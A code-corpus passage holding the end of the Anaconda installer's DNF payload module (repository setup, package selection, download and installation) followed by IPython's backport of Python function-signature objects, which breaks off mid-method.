exclude = self.data.packages.excludedList
try:
self._base.group_install(grp, types, exclude=exclude)
except dnf.exceptions.CompsError as e:
# DNF raises this when it is already selected
log.debug(e)
def _select_environment(self, env_id, excluded):
# dnf.base.environment_install excludes on packages instead of groups,
# which is unhelpful. Instead, use group_install for each group in
# the environment so we can skip the ones that are excluded.
for groupid in set(self.environmentGroups(env_id, optional=False)) - set(excluded):
self._select_group(groupid)
def _select_kernel_package(self):
kernels = self.kernelPackages
for kernel in kernels:
try:
self._install_package(kernel)
except packaging.NoSuchPackage:
log.info('kernel: no such package %s', kernel)
else:
log.info('kernel: selected %s', kernel)
break
else:
log.error('kernel: failed to select a kernel from %s', kernels)
def _sync_metadata(self, dnf_repo):
try:
dnf_repo.load()
except dnf.exceptions.RepoError as e:
id_ = dnf_repo.id
log.info('_sync_metadata: addon repo error: %s', e)
self.disableRepo(id_)
self.verbose_errors.append(str(e))
@property
def baseRepo(self):
# is any locking needed here?
repo_names = [constants.BASE_REPO_NAME] + self.DEFAULT_REPOS
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
if repo.id in repo_names:
return repo.id
return None
@property
def environments(self):
return [env.id for env in self._base.comps.environments]
@property
def groups(self):
groups = self._base.comps.groups_iter()
return [g.id for g in groups]
@property
def mirrorEnabled(self):
return True
@property
def repos(self):
# known repo ids
with self._repos_lock:
return [r.id for r in self._base.repos.values()]
@property
def spaceRequired(self):
size = self._spaceRequired()
download_size = self._download_space
valid_points = _df_map()
root_mpoint = pyanaconda.iutil.getSysroot()
for (key, val) in self.storage.mountpoints.items():
new_key = key
if key.endswith('/'):
new_key = key[:-1]
# we can ignore swap
if key.startswith('/') and ((root_mpoint + new_key) not in valid_points):
valid_points[root_mpoint + new_key] = val.format.freeSpaceEstimate(val.size)
m_points = _pick_mpoint(valid_points, download_size, size)
if not m_points or m_points == root_mpoint:
# download and install to the same mount point
size = size + download_size
log.debug("Instalation space required %s for mpoints %s", size, m_points)
return size
def _spaceRequired(self):
transaction = self._base.transaction
if transaction is None:
return Size("3000 MB")
size = sum(tsi.installed.installsize for tsi in transaction)
# add 35% to account for the fact that the above method is laughably
# inaccurate:
size *= 1.35
return Size(size)
def _isGroupVisible(self, grpid):
grp = self._base.comps.group_by_pattern(grpid)
if grp is None:
raise packaging.NoSuchGroup(grpid)
return grp.visible
def _groupHasInstallableMembers(self, grpid):
return True
def checkSoftwareSelection(self):
log.info("checking software selection")
self._bump_tx_id()
self._base.reset(goal=True)
self._apply_selections()
try:
if self._base.resolve():
log.debug("checking dependencies: success.")
else:
log.debug("empty transaction")
except dnf.exceptions.DepsolveError as e:
msg = str(e)
log.warning(msg)
raise packaging.DependencyError(msg)
log.info("%d packages selected totalling %s",
len(self._base.transaction), self.spaceRequired)
def disableRepo(self, repo_id):
try:
self._base.repos[repo_id].disable()
log.info("Disabled '%s'", repo_id)
except KeyError:
pass
super(DNFPayload, self).disableRepo(repo_id)
def enableRepo(self, repo_id):
try:
self._base.repos[repo_id].enable()
log.info("Enabled '%s'", repo_id)
except KeyError:
pass
super(DNFPayload, self).enableRepo(repo_id)
def environmentDescription(self, environmentid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
return (env.ui_name, env.ui_description)
def environmentId(self, environment):
""" Return environment id for the environment specified by id or name."""
env = self._base.comps.environment_by_pattern(environment)
if env is None:
raise packaging.NoSuchGroup(environment)
return env.id
def environmentGroups(self, environmentid, optional=True):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
group_ids = (id_.name for id_ in env.group_ids)
option_ids = (id_.name for id_ in env.option_ids)
if optional:
return list(itertools.chain(group_ids, option_ids))
else:
return list(group_ids)
def environmentHasOption(self, environmentid, grpid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
return grpid in (id_.name for id_ in env.option_ids)
def environmentOptionIsDefault(self, environmentid, grpid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
# Look for a group in the optionlist that matches the group_id and has
# default set
return any(grp for grp in env.option_ids if grp.name == grpid and grp.default)
def groupDescription(self, grpid):
""" Return name/description tuple for the group specified by id. """
grp = self._base.comps.group_by_pattern(grpid)
if grp is None:
raise packaging.NoSuchGroup(grpid)
return (grp.ui_name, grp.ui_description)
def gatherRepoMetadata(self):
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
self._sync_metadata(repo)
self._base.fill_sack(load_system_repo=False)
self._base.read_comps()
self._refreshEnvironmentAddons()
def install(self):
progress_message(N_('Starting package installation process'))
# Add the rpm macros to the global transaction environment
for macro in self.rpmMacros:
rpm.addMacro(macro[0], macro[1])
if self.install_device:
self._setupMedia(self.install_device)
try:
self.checkSoftwareSelection()
self._download_location = self._pick_download_location()
except packaging.PayloadError as e:
if errors.errorHandler.cb(e) == errors.ERROR_RAISE:
_failure_limbo()
pkgs_to_download = self._base.transaction.install_set
log.info('Downloading packages.')
progressQ.send_message(_('Downloading packages'))
progress = DownloadProgress()
try:
self._base.download_packages(pkgs_to_download, progress)
except dnf.exceptions.DownloadError as e:
msg = 'Failed to download the following packages: %s' % str(e)
exc = packaging.PayloadInstallError(msg)
if errors.errorHandler.cb(exc) == errors.ERROR_RAISE:
_failure_limbo()
log.info('Downloading packages finished.')
pre_msg = (N_("Preparing transaction from installation source"))
progress_message(pre_msg)
queue_instance = multiprocessing.Queue()
process = multiprocessing.Process(target=do_transaction,
args=(self._base, queue_instance))
process.start()
(token, msg) = queue_instance.get()
while token not in ('post', 'quit'):
if token == 'install':
msg = _("Installing %s") % msg
progressQ.send_message(msg)
(token, msg) = queue_instance.get()
if token == 'quit':
_failure_limbo()
post_msg = (N_("Performing post-installation setup tasks"))
progress_message(post_msg)
process.join()
self._base.close()
if os.path.exists(self._download_location):
log.info("Cleaning up downloaded packages: %s", self._download_location)
shutil.rmtree(self._download_location)
else:
# Some installation sources, such as NFS, don't need to download packages to
# local storage, so the download location might not always exist. So for now
# warn about this, at least until the RFE in bug 1193121 is implemented and
# we don't have to care about clearing the download location ourselves.
log.warning("Can't delete nonexistent download location: %s", self._download_location)
def getRepo(self, repo_id):
""" Return the yum repo object. """
return self._base.repos[repo_id]
def isRepoEnabled(self, repo_id):
try:
return self._base.repos[repo_id].enabled
except (dnf.exceptions.RepoError, KeyError):
return super(DNFPayload, self).isRepoEnabled(repo_id)
def languageGroups(self):
locales = [self.data.lang.lang] + self.data.lang.addsupport
match_fn = pyanaconda.localization.langcode_matches_locale
gids = set()
gl_tuples = ((g.id, g.lang_only) for g in self._base.comps.groups_iter())
for (gid, lang) in gl_tuples:
for locale in locales:
if match_fn(lang, locale):
gids.add(gid)
log.info('languageGroups: %s', gids)
return list(gids)
def preInstall(self, packages=None, groups=None):
super(DNFPayload, self).preInstall(packages, groups)
self.requiredPackages += ["dnf"]
if packages:
self.requiredPackages += packages
self.requiredGroups = groups
# Write the langpacks config
pyanaconda.iutil.mkdirChain(DNF_PLUGINCONF_DIR)
langs = [self.data.lang.lang] + self.data.lang.addsupport
# Start with the file in /etc, if one exists. Otherwise make an empty config
if os.path.exists(_DNF_TARGET_LANGPACK_CONF):
shutil.copy2(_DNF_TARGET_LANGPACK_CONF, _DNF_INSTALLER_LANGPACK_CONF)
else:
with open(_DNF_INSTALLER_LANGPACK_CONF, "w") as f:
f.write("[main]\n")
# langpacks.conf is an INI style config file, read it and
# add or change the enabled and langpack_locales entries without
# changing anything else.
keys=[("langpack_locales", "langpack_locales=" + ", ".join(langs)),
("enabled", "enabled=1")]
simple_replace(_DNF_INSTALLER_LANGPACK_CONF, keys)
def reset(self):
super(DNFPayload, self).reset()
shutil.rmtree(DNF_CACHE_DIR, ignore_errors=True)
shutil.rmtree(DNF_PLUGINCONF_DIR, ignore_errors=True)
self.txID = None
self._base.reset(sack=True, repos=True)
def updateBaseRepo(self, fallback=True, checkmount=True):
log.info('configuring base repo')
self.reset()
url, mirrorlist, sslverify = self._setupInstallDevice(self.storage,
checkmount)
method = self.data.method
# Read in all the repos from the installation environment, make a note of which
# are enabled, and then disable them all. If the user gave us a method, we want
# to use that instead of the default repos.
self._base.read_all_repos()
enabled = []
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
enabled.append(repo.id)
repo.disable()
# If askmethod was specified on the command-line, leave all the repos
# disabled and return
if flags.askmethod:
return
if method.method:
try:
self._base.conf.releasever = self._getReleaseVersion(url)
log.debug("releasever from %s is %s", url, self._base.conf.releasever)
except configparser.MissingSectionHeaderError as e:
log.error("couldn't set releasever from base repo (%s): %s",
method.method, e)
try:
proxy = getattr(method, "proxy", None)
base_ksrepo = self.data.RepoData(
name=constants.BASE_REPO_NAME, baseurl=url,
mirrorlist=mirrorlist, noverifyssl=not sslverify, proxy=proxy)
self._add_repo(base_ksrepo)
except (packaging.MetadataError, packaging.PayloadError) as e:
log.error("base repo (%s/%s) not valid -- removing it",
method.method, url)
with self._repos_lock:
self._base.repos.pop(constants.BASE_REPO_NAME, None)
if not fallback:
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
self.disableRepo(repo.id)
return
# this preserves the method details while disabling it
method.method = None
self.install_device = None
# We need to check this again separately in case method.method was unset above.
if not method.method:
# If this is a kickstart install, just return now
if flags.automatedInstall:
return
# Otherwise, fall back to the default repos that we disabled above
with self._repos_lock:
for (id_, repo) in self._base.repos.items():
if id_ in enabled:
repo.enable()
for ksrepo in self.data.repo.dataList():
log.debug("repo %s: mirrorlist %s, baseurl %s",
ksrepo.name, ksrepo.mirrorlist, ksrepo.baseurl)
# one of these must be set to create new repo
if not (ksrepo.mirrorlist or ksrepo.baseurl):
raise packaging.PayloadSetupError("Repository %s has no mirror or baseurl set"
% ksrepo.name)
self._add_repo(ksrepo)
ksnames = [r.name for r in self.data.repo.dataList()]
ksnames.append(constants.BASE_REPO_NAME)
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
id_ = repo.id
if 'source' in id_ or 'debuginfo' in id_:
self.disableRepo(id_)
elif constants.isFinal and 'rawhide' in id_:
self.disableRepo(id_)
def _writeDNFRepo(self, repo, repo_path):
""" Write a repo object to a DNF repo.conf file
:param repo: DNF repository object
:param string repo_path: Path to write the repo to
:raises: PayloadSetupError if the repo doesn't have a url
"""
with open(repo_path, "w") as f:
f.write("[%s]\n" % repo.id)
f.write("name=%s\n" % repo.id)
if self.isRepoEnabled(repo.id):
f.write("enabled=1\n")
else:
f.write("enabled=0\n")
if repo.mirrorlist:
f.write("mirrorlist=%s\n" % repo.mirrorlist)
elif repo.metalink:
f.write("metalink=%s\n" % repo.metalink)
elif repo.baseurl:
f.write("baseurl=%s\n" % repo.baseurl[0])
else:
f.close()
os.unlink(repo_path)
raise packaging.PayloadSetupError("repo %s has no baseurl, mirrorlist or metalink", repo.id)
# kickstart repo modifiers
ks_repo = self.getAddOnRepo(repo.id)
if not ks_repo:
return
if ks_repo.noverifyssl:
f.write("sslverify=0\n")
if ks_repo.proxy:
try:
proxy = ProxyString(ks_repo.proxy)
f.write("proxy=%s\n" % proxy.url)
except ProxyStringError as e:
log.error("Failed to parse proxy for _writeInstallConfig %s: %s",
ks_repo.proxy, e)
if ks_repo.cost:
f.write("cost=%d\n" % ks_repo.cost)
if ks_repo.includepkgs:
f.write("include=%s\n" % ",".join(ks_repo.includepkgs))
if ks_repo.excludepkgs:
f.write("exclude=%s\n" % ",".join(ks_repo.excludepkgs))
def postInstall(self):
""" Perform post-installation tasks. """
# Write selected kickstart repos to target system
for ks_repo in (ks for ks in (self.getAddOnRepo(r) for r in self.addOns) if ks.install):
if ks_repo.baseurl.startswith("nfs://"):
log.info("Skip writing nfs repo %s to target system.", ks_repo.name)
continue
try:
repo = self.getRepo(ks_repo.name)
if not repo:
continue
except (dnf.exceptions.RepoError, KeyError):
continue
repo_path = pyanaconda.iutil.getSysroot() + YUM_REPOS_DIR + "%s.repo" % repo.id
try:
log.info("Writing %s.repo to target system.", repo.id)
self._writeDNFRepo(repo, repo_path)
except packaging.PayloadSetupError as e:
log.error(e)
# Write the langpacks config to the target system
target_langpath = pyanaconda.iutil.getSysroot() + _DNF_TARGET_LANGPACK_CONF
pyanaconda.iutil.mkdirChain(os.path.dirname(target_langpath))
shutil.copy2(_DNF_INSTALLER_LANGPACK_CONF, target_langpath)
super(DNFPayload, self).postInstall()
def writeStorageLate(self):
pass
| gpl-2.0 |
ammarkhann/FinalSeniorCode | lib/python2.7/site-packages/IPython/utils/_signatures.py | 16 | 29681 | """Function signature objects for callables.
Back port of Python 3.3's function signature tools from the inspect module,
modified to be compatible with Python 2.7 and 3.2+.
"""
#-----------------------------------------------------------------------------
# Python 3.3 stdlib inspect.py is public domain
#
# Backports Copyright (C) 2013 Aaron Iles
# Used under Apache License Version 2.0
#
# Further Changes are Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import itertools
import functools
import re
import types
# patch for single-file
# we don't support 2.6, so we can just import OrderedDict
from collections import OrderedDict
__version__ = '0.3'
# end patch
__all__ = ['BoundArguments', 'Parameter', 'Signature', 'signature']
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', '__builtin__', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def _get_user_defined_method(cls, method_name, *nested):
try:
if cls is type:
return
meth = getattr(cls, method_name)
for name in nested:
meth = getattr(meth, name, meth)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
if not callable(obj):
raise TypeError('{0!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
if obj.__self__ is None:
# Unbound method - treat it as a function (no distinction in Py 3)
obj = obj.__func__
else:
# Bound method: trim off the first parameter (typically self or cls)
sig = signature(obj.__func__)
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {0!r} has incorrect arguments'.format(obj)
raise ValueError(msg)
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__', 'im_func')
if call is not None:
sig = signature(call)
if sig is not None:
return sig
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {0!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {0!r} is not supported by signature'.format(obj))
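# Illustrative usage (comment added; not part of the original backport):
#   def greet(name, excited=False): ...
#   sig = signature(greet)
#   str(sig)             -> '(name, excited=False)'
#   list(sig.parameters) -> ['name', 'excited']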
class _void(object):
'''A private marker - used in Parameter & Signature'''
class _empty(object):
pass
class _ParameterKind(int):
def __new__(self, *args, **kwargs):
obj = int.__new__(self, *args)
obj._name = kwargs['name']
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {0!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter(object):
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{0} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not re.match(r'[a-z_]\w*$', name, re.I):
msg = '{0!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
if formatted is None:
formatted = ''
formatted = '<{0}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{0}:{1}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{0}={1}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
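        # Rendering examples (comment added for clarity):
        #   Parameter('x', Parameter.POSITIONAL_OR_KEYWORD, default=1)  -> 'x=1'
        #   Parameter('args', Parameter.VAR_POSITIONAL)                 -> '*args'
        #   Parameter('kw', Parameter.VAR_KEYWORD)                      -> '**kw'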
def __repr__(self):
return '<{0} at {1:#x} {2!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments(object):
'''Result of :meth:`Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
arguments : :class:`collections.OrderedDict`
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
signature : :class:`Signature`
The Signature object that created this instance.
args : tuple
Tuple of positional arguments values.
kwargs : dict
Dict of keyword arguments values.
'''
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature(object):
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes:
parameters : :class:`collections.OrderedDict`
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
return_annotation
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
'''
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {0} before {1}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {0!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = params
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{0!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = getattr(func_code, 'co_kwonlyargcount', 0)
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = getattr(func, '__annotations__', {})
defaults = func.__defaults__
kwdefaults = getattr(func, '__kwdefaults__', None)
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
try:
return types.MappingProxyType(self._parameters)
except AttributeError:
return OrderedDict(self._parameters.items())
@property
def return_annotation(self):
return self._return_annotation
def replace(self, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = dict((param, idx)
for idx, param in enumerate(other.parameters.keys()))
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg)
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg)
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments')
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name))
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(self, *args, **kwargs):
'''Get a :class:`BoundArguments` object, that maps the passed `args`
